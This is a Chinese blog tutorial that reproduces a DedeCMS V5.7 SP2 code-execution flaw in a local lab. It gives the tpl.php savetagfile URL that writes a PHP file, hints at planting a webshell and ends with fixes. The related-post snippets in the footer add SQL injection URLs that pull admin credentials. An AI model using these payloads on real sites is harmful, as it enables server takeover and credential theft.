DedeCMS历史漏洞复现之代码执行漏洞

最新推荐文章于 2024-03-13 21:23:03 发布
最新推荐文章于 2024-03-13 21:23:03 发布
阅读量7.6k 收藏 16
点赞数 1
文章标签: 安全漏洞 web 手机安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jojo705/article/details/105088936
版权

本文介绍的漏洞虽然不是最新漏洞,但意在让初学者了解漏洞复现的基本流程。

首先了解一下什么是CMS。CMS是Content Management System的缩写,意为"内容管理系统"。内容管理系统是一种位于WEB 前端(Web 服务器)和后端办公系统或流程(内容创作、编辑)之间的软件系统。内容的创作人员、编辑人员、发布人员使用内容管理系统来提交、修改、审批、发布内容。这里指的“内容”可能包括文件、表格、图片、数据库中的数据甚至视频等一切你想要发布到Internet、Intranet以及Extranet网站的信息。

这里的的DedeCMS就是CMS的一种,织梦内容管理系统(DedeCMS),是一个集内容发布、编辑、管理检索等于一体的网站管理系统(Web CMS),他拥有国外CMS众多特点之外,还结合中国用户的需要,对内容管理系统概念进行明确分析和定位。

 

准备工作

1、DedeCMS源码包(这里使用的是V5.7 SP2版本);

2、PHPstudy软件(百度就可以下到);

3、VMware虚拟机软件(使用本机系统也可,建议使用虚拟机环境)。虚拟机安装windows7以上版本。

 

环境搭建

一、在虚拟机系统中安装PHPstudy软件。安装后打开软件如图一所示。

图一

二、点击网站,点击管理进入部署的网站的根目录,如图二。将事先准备的DedeCMS的源码包解压,并将uploads文件夹复制进根目录中,如图三。

图二

 

图三

三、如图四,点击启动即可开始一键部署网站环境。接着,就可以打开浏览器输入“http://127.0.0.1/uploads”开始初始化网站设置了。如图七,在对应框中输入数据库的初始密码“root”,设置好后台的登录账号和密码即可完成。

 

图四

 

图五

 

图六

 

图七

 

图八

 

 

漏洞复现

一、在域名后面加上个/dede访问后台,输入搭建的时候设置的登录账号和密码。http://127.0.0.1/uploads/dede/,如图九。

图九

二、DedeCMS V5.7 SP2版本中tpl.php存在代码执行,利用这个漏洞在增加新的标签中上传木马获取Webshell,我们先获取token,访问/dede/tpl.php?action=upload在该页面中右键查看源代码获取到token值。

图十

 

图十一

二、访问“http://127.0.0.1/uploads/dede/tpl.php?filename=secquan.lib.php&action=savetagfile&content=<?php%20phpinfo();?>&token=cd70e2295311226c12fe17810755efbb”  

【URL地址+token值自行更换】

这个URL就是建立一个secquan.lib.php文件并写入“<?php%20phpinfo();?>”这段代码。这里需要token的值来验证我们的身份权限才可以写入。如图十二。

图十二

三、接着访问/include/taglib/路径下的secquan.lib.php读取得到phpinfo。
http://127.0.0.1/uploads/include/taglib/secquan.lib.php如图十三。

图十三

 

结论总结

至此就表示成功复现了该漏洞。该phpinfo界面就是我们通过传递参数写入的非法文件,该界面可以获取网站的路径信息等。当然你也可以尝试写入一句话木马来获取服务器权限,这里暂且不表,有兴趣的朋友也可以自己尝试。

总结一下,这里的漏洞实战利用还是有一定限制的,这里首先要登录到管理后台,才可以访问到以上目录。所以要补救该漏洞就可以设置复杂的登录口令,不使用默认的账户名。另外也可以通过设定严格的路径权限或限制用户传递的文件格式等。当然,根本方法是升级版本,治标治本!

小山峰的编程之路
关注
  • 1
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DuxCMS3:DuxCMS开源内容管理系统
03-11
为快速站点开发而生 简介 DuxCMS是一种基于PHP / MYSQL开发的,专注于多个平台的基础化内容管理框架 特色 远端:采用类HMVC模式,将系统内部交互采用钩子方式,除基础应用外模块之间互相独立互不影响 轻量级:逐步采用轻量级框架开发,保留必要的类库,提升系统速度与降低学习成本 多终端支持:系统采用pc + mobile + api多终端访问模式,多种多样的用户需求,兼容传统模板开发与多种类app程序 高度灵活:系统采用composer作为依赖,同时封装常用类库 操作简单:简化用户后台操作体验,完全符合快速上手使用 便捷标签:模板采用注释类标签语法,多种格式标签,简单易开发 代码开源:系统开放源代码,方便开发者二次开发与后续协作维护 适用范围 个人网站 企业/新闻类站点 图片展示站 电子商务开发 管理系统开发 推荐环境 语言版本:PHP 7.1+ 数据库版本:Mysql 5.6+
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
DedeCms织梦系统漏洞复现
最新发布
LIU6636LIU的博客
03-13 936
1 部署好之后发现系统默认管理路径是dede,登陆管理后台可以通过地址然后有dedecms安全提示直接打开根目录修改dede文件夹为LYP重新进去管理员后台对数据进行还原看一下网站的地址接着生成新的网站然后即可访问网站,CMS搭建完毕首先打开后台管理页面开启会员功能这样就可以注册一个账户。
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
wLHK-Dedecms漏洞整理.pdf
09-20
wLHK-Dedecms漏洞整理.pdf
DedeCMS 存储型xss漏洞1
08-03
Dedecms会员功能shops_delivery.php中的 des 参数存在存储型XSS漏洞,攻击者可利用漏洞获得用户测试环境:DedeCMS-V5.7-U
DedeCMS V5.7sp2最新版本parse_str函数SQL注入漏洞
网站安全专家
08-10 3756
织梦dedecms,在整个互联网中许多企业网站,个人网站,优化网站都在使用dede作为整个网站的开发架构,dedecms采用php+mysql数据库的架构来承载整个网站的运行与用户的访问,首页以及栏目页生成html静态化,大大的加快的网站访问速度,以及搜索引擎的友好度,利于百度蜘蛛的抓取,深受广大站长以及网站运营者的喜欢。最近我们发现dedecms漏洞,存在高危的parse_str函数sql注入漏...
DedeCMS漏洞复现
qq_52223347的博客
03-10 912
介绍 织梦CMS是集简单、健壮、灵活、开源几大特点的开源内容管理系统,目前占领了国内开源CMS的大部份市场,目前已经有超过三十万个站点正在使用织梦CMS或基于织梦CMS核心开发。 官方网站: http://www.dedecms.com/ 环境搭建 phpstudy 创建数据库 解压源码到www下 Dedecms_v5.7ps2 访问 DedeCMS/uploads/install/index.php 安装 安装完成–》登陆后台 任意文件操作漏洞复现 进到网站后台–》访问 dede/tpl.php?act
dedecms 文件上传 (CVE-2019-8933)漏洞复现
weixin_42675091的博客
09-03 2565
dedecms 文件上传 (CVE-2019-8933)
DedeCMS_v5.7漏洞复现
qq_51459600的博客
04-06 1万+
DedeCMS_v5.7漏洞复现 环境搭建: 服务器:WinServer2008(10.10.10.143) + phpstudy2018 DedeCMS版本:DedeCMS-V5.7-UTF8-SP2 下载地址:https://pan.baidu.com/s/1GQjWSDe7IlMVsVJ7HvrBOw 提取码: i4wk 0x01 URL重定向 版本<=5.7sp2 漏洞复现 payload: http://10.10.10.143/Dedecms/plus/download.php?open
渗透测试实战--dedecms漏洞复现
qq_45070118的博客
08-18 5001
实验设备:一台windows服务器,一台kali,一台windows客户端 在虚拟机WIN7上使用phpstudy搭站(解压文件将文件放置在phpstudy配置文件WWW中),使用物理机进行攻击,WIN7 IP为192.168.10.5 物理机安装jdk,建立java环境,由此来运行菜刀 网页链接是WWW后的路径(http://ip/dedecms/uploads) 根据文件存放位置来定在物理机...
Dedecms 最新版漏洞收集并复现学习
墨痕诉清风的博客
09-30 5320
在用户密码重置功能处,php存在弱类型比较,导致如果用户没有设置密保问题的情况下可以绕过验证密保问题,直接修改密码(管理员账户默认不设置密保问题)。这么一次过滤,直接粗暴的将一些特殊字符替换为空,那么我们就可以通过特殊字符绕过上面的全局文件名不能包含php字符的限制,比如文件名为。这样,由于index.php中我们可以控制返回一个输入值和这个输入值经过服务器处理后的md5值。我们可以看到当uid存在值时就会进入我们现在的代码中,当cookie中的last_vid中不存在值为空时,就会将uid值赋予过去,
dedecms 漏洞汇总
热门推荐
积木网络
02-29 1万+
Dedecms 5.6 rss注入漏洞   http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1 DedeCms v5.6 嵌入
DeDeCMS v5.7{SP1,SP2} 密码修改漏洞(附PoC)
公众号shadow sock7
11-12 1万+
原文:https://paper.seebug.org/507/ 由于admin无法前台登录,所以需要先拿到admin的前台权限。 先拿到admin的前台权限 1.注册0000001用户名的账号 审核通过(或者设置为不需审核) 2. 访问/member/index.php?uid=0000001。 注意只有访问了/member/index.php?uid=0000001才会生成相应的所需的cook...
漏洞复现DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
做自己喜欢的事,并将其发挥到极致!
05-31 3028
uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一,在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。
dedecms注入漏洞 search.php,Dedecms最新注入漏洞分析及修复方法
weixin_35733151的博客
03-18 506
最近看到网上曝出的dedecms最新版本的一个注入漏洞利用,漏洞PoC和分析文章也已在网上公开.但是在我实际测试过程当中,发现无法复现。原因是此漏洞的利用需要一定的前提条件,而原分析文章当中并没有交代这些,所以这里将我的分析过程以及一些触发的必要条件总结了一下。一. 漏洞跟踪发布时间:2013年6月7日漏洞描述:DedeCMS是一个网站应用系统构建平台,也是一个强大的网站内容管理系统。基于PHP+...
dedecms漏洞简单复现
qq_53639387的博客
11-26 2719
一.利用phpstudy来搭建dedecms网站(下载phpstudy) 下载可以在官网下https://www.xp.cn/download.html 安装完成 设置如下 二.下载dedecms源码 http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7-GBK-SP2-Full.tar.gz 将其解压然后将文件名为uploads里面的文件复制到 phpstudy_pro文件中的www中三.安装dedecms ...
DEDECMS v5.6漏洞复现
_Ralph的博客
01-16 7821
织梦内容管理系统(dedecms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类cms系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 闲来无事,复现一下dedecms v5.6版
dedecms漏洞复现
03-28
由于 Dedecms 平台存在多个漏洞,以下是一个常见的 Dedecms 漏洞复现过程: 1. 扫描目标 Dedecms 站点,确定其版本号和漏洞类型。 2. 找到对应的漏洞利用代码,例如 Dedecms v5.7 SP2 sql注入漏洞利用代码: ``` http://www.target.com/search.php?kw=%27%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100%23 ``` 3. 将漏洞利用代码粘贴到浏览器地址栏并访问,如果出现错误信息或页面内容发生变化,则说明漏洞存在。 4. 利用漏洞进行攻击,例如获取敏感数据、添加管理员账户等。 需要注意的是,任何未经授权的攻击行为都是违法的,建议仅在合法的安全测试环境中进行漏洞复现和攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值